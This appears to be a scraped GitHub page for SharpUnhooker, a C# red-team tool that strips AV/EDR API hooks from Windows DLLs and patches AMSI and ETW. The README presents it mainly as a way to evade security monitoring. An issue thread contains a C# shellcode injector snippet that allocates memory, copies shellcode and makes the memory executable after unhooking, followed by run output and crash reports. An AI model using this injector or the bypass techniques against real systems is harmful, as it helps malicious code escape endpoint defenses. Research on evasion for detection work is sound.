getrektboy724 / sharpunhooker Goto Github PK

C# Based Universal API Unhooker

C# 100.00%

windows-api windows csharp pentesting red-team dll av-evasion

sharpunhooker's Introduction

SharpUnhooker

C# Based Universal API Unhooker - Automatically Unhook API Hives (ntdll.dll, kernel32.dll, advapi32.dll, and kernelbase.dll). SharpUnhooker helps you to evades user-land monitoring done by AVs and/or EDRs by cleansing/refreshing API DLLs that loaded on the process (Offensive Side) or remove API hooks from user-land rootkit (Defensive Side). SharpUnhooker can unhook EAT hooks, IAT hooks, and JMP/Hot-patch/Inline hooks. SharpUnhooker also equipped with AMSI and ETW patcher to break/disable them.

This tool is tested on Windows 10 v21H2 x64

Note

If you want to copy the code, Please dont forget to credit me.
If you want to see a good demonstration of SharpUnhooker, go check this blog post by Reigada.
Github doesn't like my Sublime Text indentation settings, so if you see some "weirdness" on the indentation, Im sorry.

Usage

Simply load the pre-compiled DLL or add the code function and call the Main function from the SharpUnhooker class. You can load the pre-compiled DLL on Powershell with Reflection.Assembly too! This code uses C# 5,so it can be compiled with the built-in CSC from Windows 10. The JMPUnhooker function is used to unhook JMP/Hot-patch/Inline hooks, the EATUnhooker function is used to unhook EAT hooks, and the IATUnhooker function is used to unhook IAT hooks. For now, the IATUnhooker and EATUnhooker cant unhook function import/export that uses ordinals instead of name. The Main function is basically "wrapper" of all of the functionality of SharpUnhooker. If you want to test the capability of SharpUnhooker, you can use the UsageExample function from SUUsageExample class. Its just a simple local shellcode injector.

SharpUnhooker's Main function in action!

To-Do List

Add function ordinals ability on EATUnhooker and IATUnhooker
Add ability to remove hooks from CLRGuard

sharpunhooker's People

Contributors

Stargazers

Watchers

sharpunhooker's Issues

EDR Test SylantStrike not bypassed?

Hey,
I'm trying to bypass the example https://github.com/CCob/SylantStrike .
The below is my code snipper using SharpUnhooker:

public class SUUsageExample{
.....
public static void Main()
    {
        SharpUnhooker.Mein();
        byte[] buf = new byte[285] { 0xfc,0x48,0x81,0xe4,0xf0,0....... }; // just message box
        run(buf);
    }

    public static void run(byte[] ShellcodeBytes)
    {
        SharpUnhooker.Mein();
        IntPtr ProcessHandle = new IntPtr(-1); // pseudo-handle for current process
        IntPtr ShellcodeBytesLength = new IntPtr(ShellcodeBytes.Length);
        IntPtr AllocationAddress = new IntPtr();
        IntPtr ZeroBitsThatZero = IntPtr.Zero;
        UInt32 AllocationTypeUsed = (UInt32)AllocationType.Commit | (UInt32)AllocationType.Reserve;
        Console.WriteLine("[*] Allocating memory...");
        NtAllocateVirtualMemory(ProcessHandle, ref AllocationAddress, ZeroBitsThatZero, ref ShellcodeBytesLength, AllocationTypeUsed, 0x04);
        Console.WriteLine("[*] Copying Shellcode...");
        Marshal.Copy(ShellcodeBytes, 0, AllocationAddress, ShellcodeBytes.Length);
        Console.WriteLine("[*] Changing memory protection setting...");
        UInt32 newProtect = 0;
        Sleep(1000);
        Console.WriteLine("[*] ...");
        NtProtectVirtualMemory(ProcessHandle, ref AllocationAddress, ref ShellcodeBytesLength, 0x40, ref newProtect);
        Console.WriteLine("[*] Passed...");

When hooking with SylantStrike on the process created with the above code, SylantStrike still detects the following call from NTDLL: NtProtectVirtualMemory(ProcessHandle, ref AllocationAddress, ref ShellcodeBytesLength, 0x40, ref newProtect);

This is the output when running the process:

ShellAnuuked.exe
[------------------------------------------]
[SharpUnhookerV4 - C# Based WinAPI Unhooker]
[         Written By GetRektBoy724         ]
[------------------------------------------]
[++++++++++++!SEQUENCE=STARTED!++++++++++++]
----------PHASE 1 == API UNHOOKING----------
[+++] NTDLL.DLL IS UNHOOKED!
[+++] NTDLL.DLL EXPORTS ARE CLEANSED!
[+++] KERNEL32.DLL IS UNHOOKED!
[+++] KERNEL32.DLL EXPORTS ARE CLEANSED!
[+++] KERNELBASE.DLL IS UNHOOKED!
[+++] KERNELBASE.DLL EXPORTS ARE CLEANSED!
[+++] ADVAPI32.DLL IS UNHOOKED!
[+++] ADVAPI32.DLL EXPORTS ARE CLEANSED!
------PHASE 2 == PATCHING AMSI AND ETW------
[*] !AMSI.DLL NOT DETECTED! [*]

[+++] !ETW PATCHED! [+++]
[+++++++++++!SEQUENCE==FINISHED!+++++++++++]
[------------------------------------------]
[SharpUnhookerV4 - C# Based WinAPI Unhooker]
[         Written By GetRektBoy724         ]
[------------------------------------------]
[++++++++++++!SEQUENCE=STARTED!++++++++++++]
----------PHASE 1 == API UNHOOKING----------
[+++] NTDLL.DLL IS UNHOOKED!
[+++] NTDLL.DLL EXPORTS ARE CLEANSED!
[+++] KERNEL32.DLL IS UNHOOKED!
[+++] KERNEL32.DLL EXPORTS ARE CLEANSED!
[+++] KERNELBASE.DLL IS UNHOOKED!
[+++] KERNELBASE.DLL EXPORTS ARE CLEANSED!
[+++] ADVAPI32.DLL IS UNHOOKED!
[+++] ADVAPI32.DLL EXPORTS ARE CLEANSED!
------PHASE 2 == PATCHING AMSI AND ETW------
[*] !AMSI.DLL NOT DETECTED! [*]

[+++] !ETW PATCHED! [+++]
[+++++++++++!SEQUENCE==FINISHED!+++++++++++]
[*] Allocating memory...
[*] Copying Shellcode...
[*] Changing memory protection setting...
[*] ...

This is SylantStrike output:

SylantStrikeInject.exe --dll=SylantStrike.dll --process=ShellAnuuked.exe
Waiting for process events
+ Listening for the following processes: shellanuuked.exe

 Injecting process ShellAnuuked.exe(10520) with DLL SylantStrike.dll

Shouldn't NTDLL be unhooked by the time NtProtectVirtualMemory(ProcessHandle, ref AllocationAddress, ref ShellcodeBytesLength, 0x40, ref newProtect); is called?

System.AccessViolationException

With GameGuard:

[+++] NTDLL.DLL IS UNHOOKED!
[+++] NTDLL.DLL EXPORTS ARE CLEANSED!
[+++] KERNEL32.DLL IS UNHOOKED!
[+++] KERNEL32.DLL EXPORTS ARE CLEANSED!
[+++] KERNEL32.DLL IMPORTS ARE CLEANSED!
[+++] KERNELBASE.DLL IS UNHOOKED!
[+++] KERNELBASE.DLL EXPORTS ARE CLEANSED!
Fatal error. System.AccessViolationException: Attempted to read or write protected memory. This is often an indication that other memory is corrupt.
at System.SpanHelpers.IndexOf(Byte ByRef, Byte, Int32)
at System.String.Ctor(SByte*)
at System.Runtime.InteropServices.Marshal.PtrToStringAnsi(IntPtr)
at SharpUnhooker.IATUnhooker(System.String)
at SharpUnhooker.Main()

Access Violation with JMP unhooking.

I get an Access Violation when attempting to write the original dll bytes back over to the section in memory:
Marshal.Copy(originalTextSectionBytes, 0, moduleTextSectionAddress, originalTextSectionBytes.Length);

Above that, we try and set the protection of this section to writeable. We set the new protection to 0x40 (PAGE_EXECUTE_READWRITE) and the old one is 0x20 (PAGE_EXECUTE_READ). However, when I query the protection of that section again, it comes back as 0x80 (PAGE_EXECUTE_WRITECOPY). Per this article, that seems correct as this section is a memory-mapped file. In theory, writes to this section should create a copy of it that is used in this process. However, I'm not sure if that's what's causing the AV and a crash.

Anyone else seeing this?

getrektboy724 / sharpunhooker Goto Github PK

sharpunhooker's Introduction

SharpUnhooker

This tool is tested on Windows 10 v21H2 x64

Note

Usage

SharpUnhooker's Main function in action!

To-Do List

sharpunhooker's People

Contributors

Stargazers

Watchers

Forkers

sharpunhooker's Issues

EDR Test SylantStrike not bypassed?

System.AccessViolationException

Access Violation with JMP unhooking.

Recommend Projects

React

Vue.js

Typescript

TensorFlow

Django

Laravel

D3

Recommend Topics

javascript

web

server

Machine learning

Visualization

Game

Recommend Org

Facebook

Microsoft

Google

Alibaba

D3

Tencent

Jobs